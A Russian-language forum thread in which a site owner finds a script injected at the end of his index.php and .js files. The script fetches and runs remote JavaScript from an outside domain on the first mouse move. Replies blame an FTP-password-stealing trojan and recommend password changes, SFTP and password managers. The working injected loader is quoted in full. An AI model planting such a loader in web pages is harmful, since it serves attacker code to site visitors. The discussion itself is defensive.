я создал хостинг. на нем несколько сайтиков. на друпале и на самописных CMS. на днях заметил, что несколько из них не работает. пальнул index.php. обнаружил, что в конце дописан следуующий код:
_script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"> _script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('__firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});}); залез в директории всех сайтов. оказалось, что такой код присутствует во всех файлах .js и index.php. я, конечно, попытался удалить этот код, но он опять возвращается на старое место. достп у меня только к Директ админ и ФТП. к ssh достпа нет. в чем дело, как думаете?
эта проблема довольно часто встречается. и связано это, как правило с тем, что на компе у вас Троян. он всегда ворует пороль и дальше приписывает еще свой код. посоетую для начала пароль поменять Директадмин на фтп акаунты. затем к техподдержке хостера нужно обратиться. они скорее всего почистят все своими скриптами. им подобные вопросы приходится обрабатывать почти каждый день. и для этого они уже давно самописные скрипты разработали.
первый раз с таким сталкиваюсь.... и в jQuery уже догадались коды вредоносные вписывать. раньше то все iframe баловались. реально, сначала у себя дырку подлечите. еще можно попробовать удалить все письма с доступами из почты своей. я помню, как то прям волна таких нападений была. производители все просто напросто строенными антивирусами обзавелись.
когда пользуетесь FTP, постарайтесь не пользоваться Far и Total Commander. аккаунты оттуда вынимаются. FlashFXP - отлично шифрет пароли. его бы я и посоветовал. возможно даже есть бесплатные аналоги.
помню, разработчик FlashFXP говорил мне на форуме, что на дешифровку AES уйдут годы. а так то действительно дешифровать можно почти все, если ресурсы соответствующие имеются.
вы, кажется, не допоняли. программа такая нешифрованные аккаунты вытаскивает. если поставите пароль FlashFXP, то получите AES-шифрование. программа то тогда бесполезной окажется!
точнее даже не так выразился. аккаунты в FlashFXP по умолчанию не шифруются, потому что они должны быть приведены к исходному виду перед использованием. осуществить это можно только за счет ключа. у FlashFXP имеется функция шифрования аккантов при помощи паролья-ключа. их необходимо вводить при запуске ;-)
все подобные шифровки отлавливаются отлично на уровне прокси для трафика. давно уже существуют таие трояны, которые драйвером цеплялись и сниффели траффик.
Ага.. И лазить всегда через sftp (для винды есть отличная прога - WinSCP). А пароли хранить в каком-нибудь менеджере паролей (KeePass, например). Ну и иметь здоровую меру паранойи - с неизвестных компов не лазить, в интернет-зале не обновлять и т.п.